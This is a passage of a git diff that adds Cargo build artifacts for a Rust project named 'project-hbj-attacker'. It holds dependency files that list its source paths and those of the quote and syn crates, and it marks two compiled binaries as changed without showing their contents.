+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-6511559cb3af9165.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-6511559cb3af9165.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-6511559cb3af9165.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-8d3f1eaf7577bb99.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-8d3f1eaf7577bb99.d
new file mode 100644
index 0000000..653590b
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-8d3f1eaf7577bb99.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-8d3f1eaf7577bb99.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-8d3f1eaf7577bb99.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-8ea09dd0e71f5ec6.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-8ea09dd0e71f5ec6.d
new file mode 100644
index 0000000..f35ec35
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-8ea09dd0e71f5ec6.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-8ea09dd0e71f5ec6.d: src/lib.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-8ea09dd0e71f5ec6.rmeta: src/lib.rs
+
+src/lib.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-93e4ff1eedef5ef2.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-93e4ff1eedef5ef2.d
new file mode 100644
index 0000000..b7a9859
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-93e4ff1eedef5ef2.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-93e4ff1eedef5ef2.d: src/main.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-93e4ff1eedef5ef2.rmeta: src/main.rs
+
+src/main.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-a64302973ba63c21.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-a64302973ba63c21.d
new file mode 100644
index 0000000..a244399
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-a64302973ba63c21.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-a64302973ba63c21.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-a64302973ba63c21.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-b1d345c5490fb68e.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-b1d345c5490fb68e.d
new file mode 100644
index 0000000..9eeab59
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-b1d345c5490fb68e.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-b1d345c5490fb68e.d: src/main.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-b1d345c5490fb68e.rmeta: src/main.rs
+
+src/main.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-b90d88b1484a19ce.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-b90d88b1484a19ce.d
new file mode 100644
index 0000000..aa7cf20
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-b90d88b1484a19ce.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-b90d88b1484a19ce.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-b90d88b1484a19ce.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-bc7bc8543b7ae63f.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-bc7bc8543b7ae63f.d
new file mode 100644
index 0000000..7251579
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-bc7bc8543b7ae63f.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-bc7bc8543b7ae63f.d: src/lib.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-bc7bc8543b7ae63f.rmeta: src/lib.rs
+
+src/lib.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-c958ff1e796a1688 b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-c958ff1e796a1688
new file mode 100755
index 0000000..3537989
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-c958ff1e796a1688 differ
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-c958ff1e796a1688.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-c958ff1e796a1688.d
new file mode 100644
index 0000000..731f7b0
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-c958ff1e796a1688.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-c958ff1e796a1688.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-c958ff1e796a1688: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-d211ab56812d141c.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-d211ab56812d141c.d
new file mode 100644
index 0000000..a7ac85e
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-d211ab56812d141c.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-d211ab56812d141c.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-d211ab56812d141c.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-e8cfde2a74014fc7.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-e8cfde2a74014fc7.d
new file mode 100644
index 0000000..e5a53cb
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-e8cfde2a74014fc7.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-e8cfde2a74014fc7.d: src/lib.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-e8cfde2a74014fc7.rmeta: src/lib.rs
+
+src/lib.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-f90959a5e918ef02 b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-f90959a5e918ef02
new file mode 100755
index 0000000..892614e
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-f90959a5e918ef02 differ
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-f90959a5e918ef02.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-f90959a5e918ef02.d
new file mode 100644
index 0000000..c971f37
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-f90959a5e918ef02.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-f90959a5e918ef02.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-f90959a5e918ef02: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker.d
new file mode 100644
index 0000000..096516e
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker.d: src/lib.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker.so: src/lib.rs
+
+src/lib.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/quote-d24ddd1b0bd9b43a.d b/01/project-hbj-attacker/target/debug/deps/quote-d24ddd1b0bd9b43a.d
new file mode 100644
index 0000000..34687fb
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/quote-d24ddd1b0bd9b43a.d
@@ -0,0 +1,13 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/quote-d24ddd1b0bd9b43a.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/ext.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/format.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/ident_fragment.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/to_tokens.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/runtime.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/spanned.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libquote-d24ddd1b0bd9b43a.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/ext.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/format.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/ident_fragment.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/to_tokens.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/runtime.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/spanned.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libquote-d24ddd1b0bd9b43a.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/ext.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/format.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/ident_fragment.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/to_tokens.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/runtime.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/spanned.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/ext.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/format.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/ident_fragment.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/to_tokens.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/runtime.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/src/spanned.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/syn-df895b4c5a72e2c4.d b/01/project-hbj-attacker/target/debug/deps/syn-df895b4c5a72e2c4.d
new file mode 100644
index 0000000..d8fbbf6
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/syn-df895b4c5a72e2c4.d
@@ -0,0 +1,57 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/syn-df895b4c5a72e2c4.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/group.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/token.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/attr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/bigint.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/buffer.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/classify.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/custom_keyword.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/custom_punctuation.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/derive.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/drops.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/error.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/expr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/ext.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/file.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/fixup.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/generics.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/ident.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/item.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/lifetime.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/lit.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/lookahead.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/mac.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/meta.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/op.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/parse.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/discouraged.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/parse_macro_input.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/parse_quote.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/pat.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/path.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/precedence.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/print.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/punctuated.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/restriction.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/sealed.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/span.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/spanned.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/stmt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/thread.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/tt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/ty.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/verbatim.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/whitespace.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/export.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/gen/clone.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/gen/debug.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/gen/eq.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/gen/hash.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libsyn-df895b4c5a72e2c4.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/group.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/token.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/attr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/bigint.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/buffer.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/classify.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/custom_keyword.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/custom_punctuation.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/derive.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/drops.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/error.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/expr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/ext.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/file.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/fixup.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/generics.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/ident.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/item.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/lifetime.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/lit.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/lookahead.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/mac.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/meta.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/op.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/parse.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/discouraged.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/parse_macro_input.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/parse_quote.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/pat.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/path.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/precedence.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/print.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/punctuated.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/restriction.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/sealed.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/span.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/spanned.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/stmt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/thread.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/tt.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/ty.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/verbatim.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/whitespace.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/export.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/gen/clone.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/gen/debug.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/gen/eq.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/gen/hash.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libsyn-df895b4c5a72e2c4.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/group.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/token.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/attr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/bigint.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/buffer.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/classify.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/custom_keyword.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/custom_punctuation.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/derive.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/drops.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/error.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/expr.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/ext.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/file.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/fixup.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/generics.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/ident.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/item.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/lifetime.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/lit.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/lookahead.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/mac.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/meta.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/op.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/parse.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/discouraged.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/parse_macro_input.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/parse_quote.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/pat.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/path.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/precedence.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/print.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/punctuated.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/restriction.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/syn-2.0.107/src/sealed.rs 